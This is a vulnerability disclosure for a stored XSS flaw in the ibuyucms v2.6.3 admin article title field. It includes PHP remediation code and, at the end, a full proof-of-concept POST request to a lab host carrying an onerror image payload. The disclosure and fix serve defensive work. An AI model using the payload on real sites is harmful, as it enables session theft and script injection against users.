
ibuyucms_v2.6.3 Backend Stored XSS Vulnerability

Download Link

https://zdown.chinaz.com/201410/ibuyucms_v2.6.3.zip

Impact of the Vulnerability

An attacker can exploit this vulnerability to steal sensitive user information, such as session cookies, login credentials, or personal data. Additionally, the attacker can use this vulnerability to perform other malicious actions, such as redirecting users to phishing pages, delivering malware payloads, or implanting malicious programs.

Affected Version

ibuyucms_v2.6.3

Vulnerability Description

The web application management backend of ibuyucms_v2.6.3 contains a stored XSS vulnerability. It resides in the "Article Category Management - Add Article - Article Title" module. Injecting XSS code into the article title and saving the article stores the payload; clicking the "View" button then triggers a browser pop-up window, confirming the stored XSS vulnerability.

Vulnerability Analysis

In the file /admin/article.php, the title parameter is neither validated nor filtered before it is stored. The backend does not filter or escape HTML tags in the user-submitted title, so content containing dangerous tags and attributes such as <script> and onerror is accepted as-is and later rendered unencoded. Adding a malicious XSS payload to the title parameter of the request is therefore enough to exploit the vulnerability.
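As an added illustration of the fix (example code, not ibuyucms's own article.php), the snippet below contrasts the unsafe pattern of echoing the raw title with output encoding for the HTML context, plus an optional input check; the function names and the assumption that the title is later written into an HTML text node are mine, and the sample payload is the URL-decoded title from the PoC request.

```php
<?php
// Added example, not ibuyucms code. Assumed: $title comes from $_POST['title']
// in /admin/article.php and is later echoed into an HTML page.
declare(strict_types=1);

// Vulnerable pattern: the stored title is written straight into the markup,
// so an <img onerror=...> in the title executes when the page is viewed.
function render_title_unsafe(string $title): string
{
    return '<h1>' . $title . '</h1>';
}

// Hardened pattern: encode on output for the HTML context. "<", ">", quotes
// and "&" become entities, so the payload is displayed as text, not parsed.
function render_title_safe(string $title): string
{
    $encoded = htmlspecialchars($title, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<h1>' . $encoded . '</h1>';
}

// Optional defence in depth on input: an article title has no legitimate need
// for markup, so reject angle brackets and inline event-handler attributes.
// Output encoding above remains the primary control.
function title_is_plain_text(string $title): bool
{
    if (mb_strlen($title, 'UTF-8') > 200) {
        return false;
    }
    return preg_match('/[<>]|\bon[a-z]+\s*=/i', $title) !== 1;
}

// Constructed sample: the decoded title from the PoC request body.
$payload = '测试22222<img src=1 onerror=alert(/xss/)>222';

echo render_title_unsafe($payload), PHP_EOL;
echo render_title_safe($payload), PHP_EOL;
var_dump(title_is_plain_text($payload));
var_dump(title_is_plain_text('测试22222'));
```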

Vulnerability Verification Process

POST /ibuyu//admin/article.php?a=mod&id=10 HTTP/1.1
Host: 10.211.55.3
Content-Length: 250
Cache-Control: max-age=0
Origin: http://10.211.55.3
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.211.55.3/ibuyu//admin/article.php?a=mod&id=10
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=9vr1t6lb3mohb3vqbupeqvej07; __51cke__=; __tins__17370478=%7B%22sid%22%3A%201756968140759%2C%20%22vd%22%3A%201%2C%20%22expires%22%3A%201756969940759%7D; __51laig__=5
Connection: close

fid=2&title=%E6%B5%8B%E8%AF%9522222<img src=1 onerror=alert(/xss/)>222&shorttitle=1&writer=%E7%AE%A1%E7%90%86%E5%91%98&tag=&keywords=%E6%B5%8B%E8%AF%95&description=111111111111&remote=1&autolitpic=1&content=1111111111&img=&ischeck=1&into_wz=%E4%BF%AE%E6%94%B9&id=10&oldtag=&a=mod_do
